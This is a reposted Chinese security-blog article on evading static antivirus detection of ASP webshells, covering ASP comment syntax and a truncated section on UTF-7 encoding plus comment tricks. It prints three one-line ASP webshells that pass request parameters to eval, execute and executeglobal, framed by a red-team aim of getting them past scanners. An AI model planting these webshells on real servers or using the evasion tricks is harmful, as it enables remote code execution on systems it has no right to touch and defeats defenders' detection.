ASP静态免杀方式研究

admin 2022年10月29日15:01:56评论33 views字数 656阅读2分11秒阅读模式

本文来自“白帽子社区红队知识星球”

作者:Xx

ASP静态免杀方式研究

ASP静态免杀方式研究


白帽子社区红队知识星球

一个专属于红队的高级威胁技术研究星球


01

ASP 简介


ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境,可⽤来创建动态 交互式⽹⻚并建⽴强⼤的web应⽤程序。当服务器收到对ASP⽂件的请求时,它会处理包含在⽤于构建 发送给浏览器的HTML(Hyper Text Markup Language,超⽂本标记语⾔)⽹⻚⽂件中的服务器端 脚本代码。除服务器端脚本代码外,ASP⽂件也可以包含⽂本、HTML(包括相关的客户端脚本)和com 组件调⽤


02

ASP 基础

注释

asp 脚本⽀持5中注释的⽅式


' 单引号 (单⾏注释)REM rem+空格 (单⾏注释)// 双斜线 (单⾏注释,VBscript,JScript可⽤,仅⽀持IIS)<!-- --> HTML注释符 (单⾏注释,VBscript可⽤,仅⽀持IIS)/* */ 多⾏注释符 (多⾏注释,JScript可⽤)


函数

在asp 中,通常使⽤以下三个vbscript函数来执⾏代码

eval 函数

<% eval request(1) %>

execute 函数

<% execute request(1) %>

executeglobal request

<% executeglobal request(1) %>


⼀般检测都是对以上三个敏感函数进⾏检测


03

UTF_7 + 注释绕过

⽹上有公开的使⽤utf-7 进⾏编码的脚本,但是这样的早已被软件加⼊了⿊名单,直接使⽤的话会被标记 如下:

原文始发于微信公众号(白帽子社区):ASP静态免杀方式研究

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月29日15:01:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ASP静态免杀方式研究https://cn-sec.com/archives/1373371.html

发表评论

匿名网友 填写信息